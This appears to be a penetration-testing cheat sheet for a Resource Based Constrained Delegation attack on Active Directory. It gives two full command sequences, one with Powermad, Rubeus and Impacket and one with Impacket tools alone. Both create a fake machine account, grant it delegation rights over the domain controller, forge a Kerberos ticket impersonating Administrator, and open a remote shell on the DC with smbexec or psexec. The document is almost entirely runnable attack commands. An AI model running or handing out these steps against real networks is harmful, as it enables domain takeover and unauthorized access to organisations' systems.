Resource Based Constrained Delegation (RBCD)

Resource Based Constrained Delegation (RBCD)

TOOLS: Bloodhound, Powermad, Powerview, Kekeo, Impacket, AD powershell module

Requirements: Your current user belongs to a group that has write access/generic all privileges on the DC.

STEPS:

1) Transfer rubeus and powermad on target machine

2) Import Powermad

Import-Module ./powermad.ps1 (Import powermad)

3) Import ActiveDirectory Module

Import-Module ActiveDirectory

4) Set Variables

Set-Variable -Name "PwnPC" -Value "PWN01"

Set-Variable -Name "targetComputer" -Value "DC" 

5) With Powermad, add the new fake computer object to AD

New-MachineAccount -MachineAccount (Get-Variable -Name "PwnPC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose ( With powermad, add the new fake computer object to AD)

6) With built-in AD modules, give the new fake computer object the Constrained Delegation privilege

Set-ADComputer (Get-Variable -Name "targetComputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "PwnPC").Value + '$') 

7) With built-in AD modules, check that the last command worked

Get-ADComputer (Get-Variable -Name "targetComputer").Value -Properties PrincipalsAllowedToDelegateToAccount 

8) With Rubeus, generate the new fake computer object password hashes.

.\rubeus.exe hash /password:123456 /user:PWN01$ /domain:DOMAIN.LOCAL 

9) Using the getST impacket module, generate a ccached TGT and used KRB5CCNAME pass the ccache file for the requested service

Impacket-getST DOMAIN.LOCAL/PWN01 -dc-ip DC.DOMAIN.LOCAL -impersonate administrator -spn http://DC.DOMAIN.LOCAL -aesKey GENERATED_AESKEY 

10) Set local variable of KRB5CCNAME to pass the ccache TGT file for the requested service

export KRB5CCNAME=administrator.ccache 

11) Use smbexec impacket module to connect with the TGT we just made to the server as the user administrator over SMB

impacket-smbexec DOMAIN.LOCAL/administrator@DC.DOMAIN.LOCAL -no-pass -k 

12) PWNED!

RBCD Impacket

1) Abuse MachineAccountQuota (if MachineAccountQuota > 0) to create a computer account

impacket-addcomputer domain.local/USER1:Password@1 -computer-name fakepc -computerpass Password@123 -dc-ip DC_IP

2) Rewrite DC's AllowedToActOnBehalfOfOtherIdentity properties

impacket-rbcd domain.local/USER1:Password@1 -action write -delegate-to 'DC$' -delegate-from 'fakepc$' -dc-ip DC_IP

3) Generate a Service Ticket for CIFS

The fake machine account requests a Kerberos Service Ticket for a privileged user (e.g., Administrator) using Service for User to Self (S4U2Self). Then, it escalates the ticket using Service for User to Proxy (S4U2Proxy) to obtain access to DC$.

Once you modify the delegation attribute, you can use the Impacket getST script to obtain a Service Ticket (ST) for impersonation. For instance, you may impersonate the Administrator or any other user within the domain.

impacket-getST domain.local/'fakepc$':Password@123 -spn cifs/DC.domain.local -impersonate administrator -dc-ip DC_IP

4) Obtain Privileged Access

After you obtain the Kerberos 􀆟ticket, you can use it with pass-the-ticket techniques.

To use the ticket, first export an environment variable that points to the created ticket.

export KRB5CCNAME=administrator@cifs_DC.domain.local@DOMAIN.LOCAL.ccache

Use impacket’s psexec for the remote code execution using the pass-the-ticket method.

impacket-psexec domain.local/administrator@DC.domain.local -k -no-pass -dc-ip DC_IP